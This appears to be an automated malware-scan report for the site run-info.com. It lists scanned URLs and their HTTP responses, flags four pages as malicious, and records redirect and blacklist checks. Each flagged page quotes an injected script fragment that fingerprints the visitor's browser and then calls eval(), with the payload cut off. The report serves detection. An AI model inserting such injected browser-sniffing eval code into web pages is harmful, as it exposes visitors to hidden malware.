Scanned pages/files
Request | Server response | Status |
http://run-info.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:15 GMT Location: index.html Server: Apache/2.2.17 (Unix) Content-Type: text/html | clean |
http://run-info.com/index.html | 200 OK Content-Length: 13090 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.run-info.com"; eval( [snippet truncated by the report; the argument passed to eval() is not shown. The visible part only classifies the visitor's browser from navigator.userAgent, so the verdict rests on the unseen eval() payload and the antivirus results.] Antivirus reports:
| ||
http://run-info.com/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72330 Content-Type: application/javascript | clean |
http://run-info.com/Portfolio | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:18 GMT Location: http://run-info.com/Portfolio/ Server: Apache/2.2.17 (Unix) Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | clean |
http://run-info.com/portfolio/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:19 GMT Location: index.html Server: Apache/2.2.17 (Unix) Content-Type: text/html | clean |
http://run-info.com/portfolio/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:19 GMT Location: index.html Server: Apache/2.2.17 (Unix) Content-Length: 0 Content-Type: text/html | clean |
http://run-info.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:20 GMT Location: index.html Server: Apache/2.2.17 (Unix) Content-Length: 0 Content-Type: text/html | clean |
http://run-info.com/services | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:23 GMT Location: http://run-info.com/services/ Server: Apache/2.2.17 (Unix) Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 | clean |
http://run-info.com/services/ | 200 OK Content-Length: 6917 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.run-info.com"; eval( [snippet truncated by the report; the argument passed to eval() is not shown] Antivirus reports:
| ||
http://run-info.com/portfolio | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:24 GMT Location: index.html Server: Apache/2.2.17 (Unix) Content-Length: 0 Content-Type: text/html | clean |
http://run-info.com/about | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:24 GMT Location: http://run-info.com/about/ Server: Apache/2.2.17 (Unix) Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | clean |
http://run-info.com/about/ | 200 OK Content-Length: 10022 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.run-info.com"; eval( [snippet truncated by the report; the argument passed to eval() is not shown] Antivirus reports:
| ||
http://run-info.com/contact | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:25 GMT Location: http://run-info.com/contact/ Server: Apache/2.2.17 (Unix) Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://run-info.com/contact/ | 200 OK Content-Length: 8088 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.run-info.com"; eval( [snippet truncated by the report; the argument passed to eval() is not shown] Antivirus reports:
| ||
http://run-info.com/js/global.js | 200 OK Content-Length: 130 Content-Type: application/javascript | clean |
http://run-info.com/blog | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:26 GMT Location: http://run-info.com/blog/ Server: Apache/2.2.17 (Unix) Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://run-info.com/blog/ | HTTP/1.1 200 OK Connection: close Date: Wed, 23 Apr 2014 13:27:27 GMT Server: Apache/2.2.17 (Unix) Content-Length: 158 Content-Type: text/html | clean |
http://www.ccgp-shanghai.gov.cn/myhall.do?method=forwordto&url=/myhall.do?method=viewshop@@supplier_id=08001156 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: run-info.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 23 Apr 2014 13:27:15 GMT
Location: index.html
Server: Apache/2.2.17 (Unix)
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: run-info.com
Referer: http://www.google.com/search?q=run-info.com
Result:
The result is similar to the first query. There are no suspicious redirects found. This comparison varies only the Referer header and looks at the server's HTTP response; the script flagged on the pages above inspects navigator.userAgent in the browser, so any client-side, browser-dependent behaviour would not appear in this check.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=run-info.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://run-info.com/
Result: run-info.com is not infected or malware details are not published yet.